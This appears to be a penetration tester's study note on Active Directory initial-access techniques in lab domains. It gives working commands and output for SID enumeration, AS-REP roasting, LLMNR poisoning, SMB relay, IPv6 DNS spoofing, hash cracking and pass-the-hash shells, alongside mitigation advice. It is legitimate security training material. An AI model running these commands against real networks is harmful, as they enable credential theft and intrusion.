Initial Attack Vectors

PRACTICE ! PRACTICE ! PRACTICE !

Anonymous $IPC share READ Access

If we have a READ access to IPC$ without authentication, we can list the domain users as an anonymous user

$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.117.62
[*] StringBinding ncacn_np:10.10.117.62[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

AS-REP Roasting

AS-REP roasting is a technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication

If the user has “Do not use Kerberos pre-authentication” - Enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline

Pre-authentication is the initial stage in Kerberos authentication, which is managed by the KDC Authentication server and is meant to prevent brute-force attacks

In simple words this means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account - Once after we gather all the usernames via kerbrute attack, we can use the Impacket's module

$ impacket-GetNPUsers -no-pass -usersfile users.txt -ouputfile loot -dc-ip 10.10.10.100 spooky.local/
$ cat loot
 $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c

Now we can use john or hashcat to crack the kerberos ticket :)

$ hashcat -m 18200 loot /opt/rockyou.txt
$ john loot --wordlist=/opt/rockyou.txt

LLMNR Poisoning

LLMNR => Link Local Multicast Name Resolution - Basically DNS

• Used to identify hosts when DNS fails to do

• Previously known as NBT-NS (Netbois Name Service)

So the key flaw is that when we respond to this service it actually responds back to us with the user's username with thier NTLMv2 hash (Password Hash)

• Basically a MITM attack where the victim requests the server to access some resouce or share and happens to enter the resource or share name wrong

• Ultimately the DNS fails to resolve the particular request and we sitting in the middle - We act like a legitimate service or user knowing the share or resource the victim wants to access and let him know that I know what your talking about

• Send me the hash and i'll connect you with the share or resource via responder

• And the attacker gets the NTLMv2 hash :)

$ sudo responder -I eth0 -rdwv 

• Now that we have the NTLMv2 hash of the rgeller user, we can simply psexec into the machine via Pass the hash attack or we'll have to try cracking the hash to get the plain-text password !

$ hashcat -m 5600 hash /opt/rockyou.txt

SMB Relay Attacks

Only applicable when SMB signing is disabled or SMB signing is enabled, but not required and the user must be an Administrator on the computer !

$ nmap -sCV -A -p 139,445 10.10.10.x 

• Turn off SMB and HTTP on Responder.conf file, run the responder to listen on the interface eth0 and meanwhile run the ntlmrelayx.py tool

Turn on Network Discovery and File Sharing !

If suppose the SMB incident doesn't relay back to the attack machine, try navigating to the attacker's IP using the victim's browser as we disabled HTTP and SMB in our configuration file :)

$ sudo responder -I eth0 -dwv

$ sudo impacket-ntlmrelayx -t 192.168.169.133 -smb2support

We can get an Interactive shell using the -iswitch via the ntlmrelayx.py impacket module

• It started an interactive shell on localhost port 11000

We can list out the available shares and use them accordingly !

# shares
ADMIN$
C$
IPC$
Share

# use ADMIN$
#ls
[ REDACTED ]

We can pretty much add,get files into/fromthe ADMIN$ share (Basically System32) and take control over the system :)

• Create a meterpreter executable payload like exploit.exe and execute it using the -e switch via the ntlmrelayx impacket module !

• We can even execute system command via the -c switch via the ntlmrelayx

Mitigation Strategies

• Enable SMB Signing on all the devices

• Pros => Completely Stops the attack

• Cons => Performance issues when it comes to file sharing

• Disable NTLM authentication on network

• Pros => Completely stops the attack

• Cons => If Kerberos stops working, Windows defaults back to NTLM

• Account tiering

• Pros => Limits domain admins to specify tasks (Only logon to servers with the need of Domain Admin)

• Cons => Enforcing the policy may be difficult

• Local admin restriction

• Pros => Can prevent a lot of lateral movement

• Cons => Potential increase in the amount of service desk tickets

Gaining Shell Access

• We can use metasploit's psexec module (exploit/windows/smb/psexec) to gain a shell on the machine or we can even use the powershell module (exploit/windows/smb/psexec_psh)

• We can even use the Impacket's psexec module

impacket-psexec marvel.local/fcastle:Password1@192.168.57.141
smbexec.py marvel.local/fcastle:Password1@192.168.57.141
wmiexec.py marvel.local/fcastle:Password1@192.168.57.141
evil-winrm -i 10.10.10.100 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

IPv6 DNS Attacks

Every windows or linux machine have a network adapter which has several interfaces, the most two common ones are IPv4 and IPv6 interfaces, every machine utilizes the IPv4 address for which the DNS is set - But what about IPv6, whose doing DNS for v6 ?, it is enabled but not used !

• So the attacker be like, Hey I'm your DNS so i'm gonna spoof the DNS Server, So send all the IPv6 traffic to me :)

The issue here is we can get the authentication to the DC via LDAP protocol or via SMB

Before starting the Attack, make sure LDAPs is up and configured on the DC

mitm6 -d marvel.local

impacket-ntlmrelayx -6 -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme

Now let's reboot our victim machine so that it restarts all the machine's configs such as DHCP and DNS for all the network interfaces

• Now IPv6 is asking the network like whose got my DNS, since we are relaying for connections using the impacket module and have our mitm set, we pretend to be the DNS serving for the IPv6

It has created a new directory called lootme, which contains all the domain_computers, groups, policy, trusts information and thier descriptions in plain text format !

The worst of both worlds: Combining NTLM Relaying and Kerberos delegationdirkjanm.io

Mitigation Strategies

• Disable IPv6

• Pre-define rules to block instead of allow

• Configure firewalls

• Relaying to LDAP and LDAPs can only be mitigated by enabling both LDAP signing and LDAP channel binding

• Consider administrative users to the protected users group or marking them as account is sensitive and cannot be delegated - This will prevent any impersonation of that user via delegation

Pass-Back Attacks - Exploiting IoT

How to Hack Through a Pass-Back Attack: MFP Hacking Guide

Other Attack vectors and Strategies . . . . .

• Begin the day with mitm6 or Responder

Especially when the users login to thier computers, morning around 8 or after a lunch break

• Run scans to generate traffic

• If scans are taking too long, look for websites in scope (Metasploit module => http_version)

• Look for default credentials on web logins => Printers - Jenkins etc